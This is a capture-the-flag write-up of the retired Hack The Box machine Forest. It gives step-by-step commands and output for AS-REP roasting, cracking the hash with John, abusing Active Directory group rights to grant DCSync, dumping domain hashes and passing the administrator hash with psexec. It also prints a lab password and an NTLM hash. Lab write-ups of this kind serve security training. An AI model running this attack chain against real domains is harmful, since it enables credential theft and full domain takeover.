We always start with an nmap scan…..
Nmap -sC -sV -oA nmap <Target-IP>
# Nmap 7.91 scan initiated Thu Jul 8 10:35:07 2021 as: nmap -sC -sV -oA nmap 10.10.10.161 Nmap scan report for 10.10.10.161 Host is up (0.44s latency). Not shown: 989 closed ports PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-08 12:43:38Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 5h27m46s, deviation: 4h02m31s, median: 3h07m44s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: FOREST | NetBIOS computer name: FOREST\x00 | Domain name: htb.local | Forest name: htb.local | FQDN: FOREST.htb.local |_ System time: 2021-07-08T05:44:09-07:00 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2021-07-08T12:44:07 |_ start_date: 2021-07-08T04:47:27 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Jul 8 10:36:53 2021 -- 1 IP address (1 host up) scanned in 106.43 seconds
We have our Nmap scan result but before going deep let try to scan if we have
winrm port open.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/retired/10.10.10.161] └─$ nmap -sC -sV -p 5985 10.10.10.161 Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-10 11:27 WAT Nmap scan report for htb.local (10.10.10.161) Host is up (0.68s latency). PORT STATE SERVICE VERSION 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 23.65 seconds
Now let start our enumeration on SMB port first.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/retired/10.10.10.161] └─$ smbclient -L //10.10.10.161/ -N Anonymous login successful Sharename Type Comment --------- ---- ------- SMB1 disabled -- no workgroup available
Anonymous login successful but got nothing so i decide to enumerate SMB more with
enum4linux but let first add
htb.local to our hosts file which is located at
enum4linux -a htb.local
We have some users also a service account
svc-alfresco let try to save all users in a txt file.
Administrator DefaultAccount krbtgt sebastien lucinda svc-alfresco andy mark muzec cybery jelly sheesh santi
If Kerberos pre-authentication is disabled on any of the above accounts, we can use the GetNPUsers impacket script to send a request for authentication KDC which will then return a TGT that is encrypted with the user’s password.
GetNPUsers.py -dc-ip htb.local htb.local/svc-alfresco -no-pass
Now that we have the user hash let crack it using
John The Ripper tools.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/retired/10.10.10.161] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL) 1g 0:00:00:06 DONE (2021-07-10 12:02) 0.1639g/s 669796p/s 669796c/s 669796C/s s4553592..s3r2s1 Use the "--show" option to display all of the cracked passwords reliably Session completed
Boom we have the password
s3rvice now let try using it on WinRM port with
evil-winrm -i htb.local -u svc-alfresco -p 's3rvice'
user.txt cool right.
System / Administrator
winPEAS give a bunch of output so i decided to download
SharpHound.exe and upload it on the target.
Now let run the program.
We have two output files we need to download it to our machine.
Let download the ZIP file.
Now that we how the zip file on our machine, we need to upload it to BloodHound. If you don’t have BloodHound installed on your machine, use the following command to install it.
apt-get install bloodhound
We can also download it from github
Now let start up the neo4j database.
sudo neo4j console
Now let run bloodhound.
Now let log in with our
neo4j credentials. Now let drag and drop the zip file or upload it into BloodHound. Then set the start node to be the svc-alfresco user.
Now let right click on the user and select
Mark User as Owned.
Now we should have a skull head on the user
SVC-ALFRESCO@HTB.LOCAL . Now time to analyze.
Pre-Built Analytics Queries click on
Shortest Paths to Domain Admins from Owned Principals and we should have the diagram below.
We can see that
svc-alfresco is a member of the group
Service Accounts which is a member of the group
Privileged IT Accounts, which is a member of
Account Operators. Moreover, the
Account Operators group has Generic All permissions on the
Exchange Windows Permissions group, which has WriteDacl permissions on the domain.
Now let me try and break it down;
- svc-alfresco is not just a member of Service Accounts, but is also a member of the groups Privileged IT Accounts and Account Operators.
- The Account Operators group grants limited account creation privileges to a user. Therefore, the user svc-alfresco can create other users on the domain.
- The Account Operators group has GenericAll permission on the Exchange Windows Permissions group. This permission essentially gives members full control of the group and therefore allows members to directly modify group membership. Since svc-alfresco is a member of Account Operators, he is able to modify the permissions of the Exchange Windows Permissions group.
- The Exchange Windows Permission group has WriteDacl permission on the domain HTB.LOCAL. This permission allows members to modify the DACL (Discretionary Access Control List) on the domain. We’ll abuse this to grant ourselves DcSync privileges, which will give us the right to perform domain replication and dump all the password hashes from the domain.
Now let list our attack path.
- Create a user on the domain. This is possible because svc-alfresco is a member of the group Account Operators.
- Add the user to the Exchange Windows Permission group. This is possible because svc-alfresco has GenericAll permissions on the Exchange Windows Permissions group.
- Give the user DcSync privileges. This is possible because the user is a part of the Exchange Windows Permissions group which has WriteDacl permission on the htb.local domain.
- Perform a DcSync attack and dump the password hashes of all the users on the domain.
- Perform a Pass the Hash attack to get access to the administrator’s account.
All thanks to Rana Khalil for breaking it down because am also new to Active Directory and using BloodHound.
Now let hit it.
net user itmuzec muzec123 /add /domain
Now let Add the user to to the Exchange Windows Permission group.
net group "Exchange Windows Permissions" /add itmuzec
We need to give the user DCSync privileges we can use PowerView for this. First let download Powerview and setup a python server in the directory it resides in to transfer it.
python -m SimpleHTTPServer
Now let download the script on the target.
Time to abuse it.
$SecPassword = ConvertTo-SecureString 'muzec123' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('HTB\itmuzec', $SecPassword) Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity itmuzec -Rights DCSync
Back to our machine now let run
secretsdump.py from impacket.
Confirming the Administrator hash with
crackmapexec smb 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6
Boom Now let use
psexec.py from Impacket to perform a pass the hash attack with the Administrator’s hash.
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 email@example.com
We have shell and we are done.
Greeting From Muzec